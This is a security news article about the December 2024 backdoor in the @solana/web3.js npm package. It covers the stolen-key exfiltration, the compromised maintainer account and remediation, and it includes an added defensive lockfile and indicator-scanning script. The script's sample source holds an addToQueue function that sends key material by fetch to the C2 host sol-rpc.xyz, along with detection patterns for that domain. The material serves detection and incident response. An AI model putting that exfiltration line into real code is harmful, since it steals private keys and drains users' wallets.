Critical Backdoor Discovered in Solana's Popular @solana/web3.js npm Library

December 4, 2024

Cybersecurity researchers have uncovered a software supply chain attack on the widely used @solana/web3.js npm package. Two malicious releases, versions 1.95.6 and 1.95.7, were published with code designed to steal private keys from applications using the library and drain the associated cryptocurrency wallets. Both versions have since been removed from the npm registry.

What Happened?

The @solana/web3.js package, essential for developers building Node.js and web applications on the Solana blockchain, boasts over 400,000 weekly downloads. The attack involved injecting malicious code into the package to exfiltrate private keys from unsuspecting developers and users.

According to security firm Socket, the injected code added an addToQueue function that exfiltrated private keys to a command-and-control (C2) server at sol-rpc[.]xyz, hiding the key material in HTTP headers crafted to look like legitimate Cloudflare headers. Security researcher Christophe Tafani-Dereeper noted that calls to this function were inserted at the code paths that legitimately access private keys, so the exfiltration blended in with normal key handling and was difficult to spot.

How Did This Happen?

It is suspected that a maintainer's npm account fell victim to a phishing attack, giving the threat actors publish access and allowing them to push the rogue versions. Steven Luscher, one of the library's maintainers, confirmed:

"A publish-access account was compromised for @solana/web3.js, a JavaScript library commonly used by Solana dApps. This allowed an attacker to publish unauthorized and malicious packages that were modified, enabling them to steal private key material and drain funds from dApps that handle private keys directly."

Who Is Affected?

The incident impacts projects that:

  • Directly handle private keys.
  • Updated to versions 1.95.6 or 1.95.7 between 3:20 p.m. UTC and 8:25 p.m. UTC on December 2, 2024.

Non-custodial wallets and applications that do not expose private keys during transactions are generally not affected.

What Should You Do?

If you are using @solana/web3.js as a dependency:

  1. Update Immediately: Upgrade to the latest version (1.95.8 or newer), which no longer contains the malicious code, and make sure every copy of the package resolved in your lockfile (including transitive copies pulled in by other SDKs) is off the affected versions.
  2. Rotate Keys: If any environment that handles private keys ran 1.95.6 or 1.95.7, treat those keys as compromised and rotate your authority keys to secure your assets.
  3. Audit Dependencies: Review your project's lockfile and installed packages for unexpected version changes, and check CI and deployment logs for installs that fell inside the exposure window.
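The script below is an added example, not code from the article, from Socket, or from the Solana project. It implements the audit step above and the detection side of the mechanism described under "What Happened?": it walks a package-lock.json (lockfileVersion 1, 2 or 3) for any copy of @solana/web3.js that resolved to 1.95.6 or 1.95.7, scans package source for the two indicators the article reports (an addToQueue function and the sol-rpc[.]xyz domain), and checks whether an install timestamp falls inside the published exposure window. The lockfile and source snippet are constructed samples; the header name in the sample is invented and is not the one the real malware used.

```javascript
// Added example (not code from the article, Socket, or the Solana project):
// audit a project for the two compromised @solana/web3.js releases and scan
// package source for the indicators the article reports. All inputs below
// are constructed samples, not real lockfiles or the real malicious code.

const PACKAGE = "@solana/web3.js";
const MALICIOUS_VERSIONS = new Set(["1.95.6", "1.95.7"]);

// Exposure window from the advisory: 15:20 to 20:25 UTC on 2 December 2024.
const WINDOW_START = Date.UTC(2024, 11, 2, 15, 20);
const WINDOW_END = Date.UTC(2024, 11, 2, 20, 25);

// Indicators taken from the article's description of the backdoor. The exact
// header names used for exfiltration are not reproduced here.
const IOCS = [
  { name: "addToQueue exfiltration function", re: /\baddToQueue\b/ },
  { name: "C2 domain sol-rpc[.]xyz", re: /sol-rpc\.xyz/i },
];

// Return every install path in a package-lock.json where @solana/web3.js
// resolved to a compromised version. Handles lockfileVersion 2/3 ("packages"
// map keyed by path) and lockfileVersion 1 (nested "dependencies" tree), so
// transitive copies under other packages' node_modules are caught too.
function auditLockfile(lock) {
  const hits = [];
  if (lock.packages) {
    for (const [path, meta] of Object.entries(lock.packages)) {
      if (path.endsWith("node_modules/" + PACKAGE) && MALICIOUS_VERSIONS.has(meta.version)) {
        hits.push({ path, version: meta.version });
      }
    }
    return hits;
  }
  const walk = (deps, prefix) => {
    for (const [name, meta] of Object.entries(deps || {})) {
      const path = prefix + "node_modules/" + name;
      if (name === PACKAGE && MALICIOUS_VERSIONS.has(meta.version)) {
        hits.push({ path, version: meta.version });
      }
      walk(meta.dependencies, path + "/");
    }
  };
  walk(lock.dependencies, "");
  return hits;
}

// Scan the text of an installed package file for the indicators above and
// report the 1-based line number of each match.
function scanSource(text) {
  const findings = [];
  text.split("\n").forEach((line, i) => {
    for (const ioc of IOCS) {
      if (ioc.re.test(line)) findings.push({ line: i + 1, indicator: ioc.name });
    }
  });
  return findings;
}

// True if an install or CI timestamp (ISO 8601 string) falls inside the
// window during which the malicious versions were live on npm.
function inExposureWindow(isoTimestamp) {
  const t = Date.parse(isoTimestamp);
  return t >= WINDOW_START && t <= WINDOW_END;
}

// Constructed sample lockfile (v3): the top-level copy is compromised, a
// nested copy under another SDK is not.
const SAMPLE_LOCK = {
  name: "example-dapp",
  lockfileVersion: 3,
  packages: {
    "": { name: "example-dapp", dependencies: { "@solana/web3.js": "^1.95.0" } },
    "node_modules/@solana/web3.js": { version: "1.95.7" },
    "node_modules/some-sdk": { version: "2.0.0", dependencies: { "@solana/web3.js": "1.95.4" } },
    "node_modules/some-sdk/node_modules/@solana/web3.js": { version: "1.95.4" },
  },
};

// Constructed sample source mimicking the pattern the article describes: an
// addToQueue function that sends key material to the C2 host in a header.
// The header name here is invented for the sample.
const SAMPLE_SOURCE = [
  "function addToQueue(keyMaterial) {",
  "  fetch('https://sol-rpc.xyz/api', { headers: { 'x-constructed-header': keyMaterial } });",
  "}",
  "function signTransaction(tx, keypair) { return tx.sign(keypair); }",
].join("\n");

function report() {
  return {
    lockfileHits: auditLockfile(SAMPLE_LOCK),
    sourceFindings: scanSource(SAMPLE_SOURCE),
    ciRunExposed: inExposureWindow("2024-12-02T16:05:00Z"),
  };
}

console.log(JSON.stringify(report(), null, 2));
```

To run it against a real project, replace SAMPLE_LOCK with the parsed contents of package-lock.json and feed scanSource the files under node_modules/@solana/web3.js. A clean lockfile audit is not proof of safety on its own: a machine that installed 1.95.6 or 1.95.7 during the window and later upgraded will show only the patched version, which is why the timestamp check against CI and deployment logs matters for the key-rotation decision.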

Wider Implications

This attack underscores the risk inherent in open-source package registries such as npm: a single compromised publish account is enough to push malicious code to every project that picks up the new release. Threat actors continue to exploit these platforms to distribute malware, capitalizing on the trust developers place in widely used libraries.

Recently, a fraudulent Solana-themed npm package named solana-systemprogram-utils was discovered. It rerouted a user's funds to an attacker-controlled wallet in roughly 2% of transactions, a rate low enough to avoid suspicion while still siphoning funds.

Security researcher Kirill Boychenko highlighted the risks:

"The malware threatens individual developers by stealing their credentials and wallet data, which can lead to direct financial losses. For organizations, compromised systems create vulnerabilities that can spread throughout enterprise environments, enabling widespread exploitation."

Conclusion

The discovery of the backdoor in @solana/web3.js serves as a critical reminder of the importance of vigilance in software supply chains. Developers should:

  • Regularly audit and monitor dependencies, pinning versions through a lockfile so upgrades are deliberate rather than automatic.
  • Implement security best practices, such as two-factor authentication on accounts with publish access to package registries.
  • Stay informed about potential threats and updates within the ecosystem.

Protecting the integrity of development environments is paramount to safeguarding both individual and organizational assets in the rapidly evolving landscape of blockchain technology.


Stay safe and ensure your applications are secure by integrating robust security tools and practices into your development workflow.
